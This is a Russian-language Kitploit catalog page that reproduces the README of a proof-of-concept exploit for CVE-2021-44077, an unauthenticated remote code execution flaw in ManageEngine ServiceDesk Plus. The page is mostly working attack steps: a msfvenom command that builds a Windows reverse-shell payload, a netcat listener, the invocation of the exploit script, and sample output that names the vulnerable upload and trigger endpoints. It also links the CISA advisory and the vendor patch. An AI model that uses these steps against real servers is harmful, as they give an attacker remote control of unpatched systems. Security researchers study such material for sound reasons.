Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44077 — Эксплойт PoC для ManageEngine ServiceDesk Plus CVE-2021-44077 | Kitploit
Инструменты/GitHubGitHub/horizon3ai/cve-2021-44077
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubhorizon3ai/cve-2021-44077

CVE-2021-44077

Эксплойт PoC для ManageEngine ServiceDesk Plus CVE-2021-44077

Репозиторий
3694 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-44077

Эксплойт Proof of Concept для CVE-2021-44077: PreAuth RCE в ManageEngine ServiceDesk Plus < 11306

Основано на:

  • https://xz.aliyun.com/t/10631

Рекомендации CISA:

  • https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

Устранение (обновление до сборки 11306 или выше):

  • https://www.manageengine.com/products/service-desk/security-response-plan.html

Протестировано на ManageEngine ServiceDesk Plus сборка 11303. Все антивирусы отключены.

Использование

Эксплойт загружает исполняемый файл Windows на цель и запускает его.

Для эксплуатации сначала сгенерируйте любой исполняемый файл. Например:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

Выполните pip install -r requirements.txt или убедитесь, что у вас установлен пакет requests.

Если вы пытаетесь перехватить обратную оболочку, сначала запустите слушатель, например:

root@kitploit:~
nc -l 4444

Затем запустите скрипт эксплойта, передав аргументы url и exe, например:

root@kitploit:~
python exploit.py http://<TARGET>:<PORT> <path_to_exe>

Пример вывода скрипта:

root@kitploit:~
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Доказательство

Примечания к эксплойту

  • Уязвимость позволяет загрузить любой файл в каталог bin установки, включая существующие файлы, такие как пакетные скрипты. Могут быть и другие способы вызова загруженного файла.
  • Прямая загрузка веб-шелла, по-видимому, блокируется фильтром.

Отказ от ответственности

Данное программное обеспечение создано исключительно в целях академического исследования и разработки эффективных методов защиты и не предназначено для использования для атаки на системы, за исключением случаев явно выраженного разрешения. Разработчики проекта не несут ответственности за неправомерное использование данного программного обеспечения. Используйте ответственно.

Скачать инструмент